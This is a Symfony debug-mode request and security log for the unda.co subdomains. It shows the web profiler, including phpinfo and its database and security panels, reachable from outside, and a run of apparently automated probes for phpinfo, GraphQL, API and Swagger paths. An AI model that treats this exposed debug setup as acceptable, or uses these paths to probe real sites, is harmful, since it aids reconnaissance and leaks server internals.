[2025-12-20 15:12:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 15:13:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-20 15:21:55] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-20 15:22:57] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 15:23:00] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"ac1601","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/ac1601","method":"GET"} []
[2025-12-20 15:25:24] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"006517","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/006517/search/results?ip=141.95.74.78&limit=10","method":"GET"} []
[2025-12-20 15:25:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=141.95.74.78&limit=10","method":"GET"} []
[2025-12-20 15:26:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40ca6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f40ca6?panel=validator","method":"GET"} []
[2025-12-20 15:26:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-20 15:27:33] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"5f0320","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/5f0320/search/results?ip=216.108.237.50&limit=10","method":"GET"} []
[2025-12-20 15:27:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=216.108.237.50&limit=10","method":"GET"} []
[2025-12-20 15:27:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=cache","method":"GET"} []
[2025-12-20 15:27:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 15:28:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"59964f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/59964f?panel=db","method":"GET"} []
[2025-12-20 15:28:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 15:30:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7a1fc0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7a1fc0?panel=twig","method":"GET"} []
[2025-12-20 15:30:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 15:30:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=cache","method":"GET"} []
[2025-12-20 15:30:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 15:34:01] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 15:35:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=cache","method":"GET"} []
[2025-12-20 15:35:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 15:35:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ed5b89","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ed5b89?panel=dump","method":"GET"} []
[2025-12-20 15:35:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-20 15:37:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"48ebd7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/48ebd7?panel=db","method":"GET"} []
[2025-12-20 15:37:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 15:38:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=events","method":"GET"} []
[2025-12-20 15:38:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-20 15:43:58] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 15:46:48] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"0409e5","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/0409e5/search/results?ip=216.106.187.123&limit=10&method=GET","method":"GET"} []
[2025-12-20 15:46:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=216.106.187.123&limit=10&method=GET","method":"GET"} []
[2025-12-20 15:48:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7a1fc0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7a1fc0?panel=time","method":"GET"} []
[2025-12-20 15:48:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 15:49:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 15:51:58] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-20 15:52:00] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 15:53:55] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 15:53:56] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 15:56:19] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 15:56:19] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-20 15:56:19] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 15:56:19] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 15:56:19] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 15:56:19] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 15:56:19] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 15:56:19] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 15:56:19] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 15:56:20] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-20 15:56:20] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 15:56:21] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 15:56:22] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-20 15:56:22] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 15:56:22] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 15:56:22] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 15:56:22] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 15:56:22] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 15:56:22] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 15:56:23] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
[2025-12-20 15:56:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 15:56:29] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-20 15:56:29] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 15:56:29] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 15:56:29] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 15:56:29] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 15:56:29] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 15:56:29] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 15:56:30] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-20 15:56:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 15:57:06] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-20 16:03:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7a1fc0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7a1fc0?panel=security","method":"GET"} []
[2025-12-20 16:03:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-20 16:05:57] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 16:08:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f750b2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f750b2?panel=validator","method":"GET"} []
[2025-12-20 16:08:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-20 16:11:39] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 16:11:40] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-20 16:11:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:11:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:11:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:11:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:11:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:11:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:11:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:11:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:11:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:11:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:11:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:11:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:11:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:11:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 16:11:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
